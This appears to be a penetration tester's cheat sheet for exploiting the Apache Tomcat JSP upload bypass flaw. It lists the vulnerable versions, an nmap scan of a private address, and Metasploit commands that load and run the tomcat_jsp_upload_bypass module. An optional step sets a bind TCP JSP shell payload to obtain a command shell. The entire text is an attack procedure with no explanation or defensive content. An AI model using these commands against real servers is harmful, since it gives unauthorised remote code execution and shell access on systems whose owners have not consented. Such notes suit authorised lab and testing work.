Apache Tomcat

• Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution

#Enumeration

db_nmap -sS -sV -O 10.2.24.113

• Try tomcat from a browser

  • http://10.2.24.113:8080/

services
search type:exploit tomcat_jsp
use exploit/multi/http/tomcat_jsp_upload_bypass
info
# Description:
#  This module uploads a jsp payload and executes it.
check
run

• Or use a specific payload

set payload java/jsp_shell_bind_tcp
options
set SHELL cmd
run